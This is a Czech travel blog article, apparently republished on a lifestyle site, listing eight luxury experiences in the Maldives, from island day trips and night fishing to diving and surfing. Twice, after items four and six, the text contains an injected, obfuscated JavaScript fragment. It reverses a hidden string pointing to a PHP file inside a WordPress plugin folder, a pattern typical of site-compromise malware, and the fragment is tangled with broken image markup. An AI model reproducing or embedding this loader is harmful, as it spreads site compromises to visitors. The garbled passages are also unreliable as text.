FACESTARŽivotní styl8 LUXUSNÍCH ZÁŽITKŮ, KTERÉ NA MALEDIVÁCH MUSÍTE ZAŽÍT! ODPOČÍVEJTE V KORÁLOVÉM RÁJI!

8 LUXUSNÍCH ZÁŽITKŮ, KTERÉ NA MALEDIVÁCH MUSÍTE ZAŽÍT! ODPOČÍVEJTE V KORÁLOVÉM RÁJI!

1. Jednodenní výlet na opuštěný ostrov

1. Jednodenní výlet na opuštěný ostrov

Asi jedním z nejoblíbenějších výletů bývá celodenní pobyt na některém z nedalekých opuštěných ostrovů. Tyto ostrovy jsou přímo uzpůsobené denním výletům nejen pro turisty. Na ostrově si většinou každý z turistů najde svůj kousek prázdné pláže a můžete si tak užívat soukromí v některé z tyrkysových lagun. V ceně zájezdů bývá většinou i občerstvení. Hodně často vám připraví různé ryby na grilu se zeleninovým salátem.

and

2. Noční rybaření

Hodně oblíbenou atrakcí bývá i noční rybaření s místními rybáři. Někdy se jezdí na loď v noci, jindy brzy ráno. Máte tak možnost vydat se na rybářskou plavbu a chytit si svou vlastní maledivskou rybu, kterou vám poté kuchař v hotelu připraví k obědu. Tento zážitek patří k jedněm z nejoblíbenějších a poskytují ho prakticky všechny hotely a resorty.

and

3. Výlety za potápěním/ šnorchlováním

Pokud jste milovníci potápění a šnorchlování stejně jako já, tenhle výlet a to minimálně jednou, byste při svém pobytu na Maledivách měli absolvovat. Pokud budete ubytováni na resortech, naleznete prakticky na každém alespoň základní potápěčské centrum, ve kterém vás seznámí se základy potápění a vezmou vás na zkušební ponor. Pokud jste zkušenými potápěči, není nic lehčího, než předložit váš průkaz a zapůjčit si potřebnou výstroj, případně si zaplatit průvodce. No, a pokud se z jakéhokoliv důvodu potápět nechcete, vystačíte si bohatě i se šnorchlováním. Korálové útesy na Maledivách jsou nádherné. Můžete se nechat zavézt lodí na některé z oblíbených míst, kde budete mít pestrobarevné útesy i mořské živočichy pouze pro sebe.

and

4. Výlet na osamocený písčitý výběžek

Podobně, jako se můžete vydatna osamocený ostrov, můžete si naplánovat i několik hodin na osamoceném písčitém výběžku. Výhodou je, že průvodce, který vás tam vezme, vám najde místo, kde budete pouze a jen sami s vaším partnerem, případně s vaší rodinou a přáteli. S sebou si můžete vzít lehátka/deku a slunečník a dle domluvy vám na lodi připraví oběd. Vy si tak můžete dopřát úžasných několik hodin daleko od turistického ruchu, uprostřed moře.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand20guraidhoo20reef20326.jpg“ />

5. Výlety za pozorováním delfínů

Poměrně častým výletem, který nabízí jak hotely na obydlených ostrovech, tak i jednotlivé resorty, je výlet lodí za pozorováním delfínů. To, zda se tento výlet vyplatí, si musí každý promyslet sám, ale z vlastní zkušenosti mohu říci, že ať si zaplatíte jakýkoliv jiný výlet lodí, při cestě určitě nějakou rodinku delfínů potkáte.

and

6. Výlet do luxusního resortu

Dalším z oblíbených výletů je strávení jednoho dne na některém z okolních luxusních resortů. Prakticky na každém z atolů můžeme nalézt několik resortů, které takříkajíc stojí za hřích. Tyto výlety se nabízí převážně z hotelů a pensionů, pokud jste ubytováni na obydlených ostrovech. Výhodou tak je, že bydlíte levně a přes den se podíváte a užijete si luxusu v resortech. Většinou to funguje tak, že zaplatíte za dopravu lodí a vstup do daného resortu. Někdy je v rámci vstupu i určitý budget, v rámci kterého můžete využívat služby v resortu. Jindy si platíte v rámci vstupu rovnou neomezenou konzumaci jídla i pití přesně tak, jako byste byli hosty resortu.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand20guraidhoo20reef20351.jpg“ />

7. Surfování

Jste milovníci surfování, nebo se s prknem na vlnách teprve učíte? Doporučuji vyhledávat vaše ubytování dle možností k surfování, kterých je na Maledivách také spousta. Z vlastní zkušenosti mohu jmenovat lokalitu kolem obydleného ostrova Guraidhoo v jižním Male atolu. Dopředu doporučuji vybírat i vhodné ubytování, kde výlety za surfováním poskytují. Většinou jsou tyto informace uvedeny v charakteristice hotelů.

and

8. Týden na potápěčské jachtě

Jste vášnivými potápěči, ale i přesto nechcete strávit celou dovolenou jen potápěním? Nabízí se vám možnost zkombinovat si týden na potápěčské jachtě, na kterou se nalodíte např. v přístavu u letiště a k tomu si přidat další týden na obydleném ostrově, kde poznáte místní atmosféru a podle vašich finančních možností zvolit na třetí týden luxusní a romantický pobyt na resortu.

and

Doufám, že vás mé tipy inspirovaly k vaší úžasné dovolené na Maledivách! Krásnou dovolenou vám přeje vaše dovolenkářka. Blog dovolenkářky se skvělými radami na cestování naleznete na www.dovolenkarka.cz.

 

Související články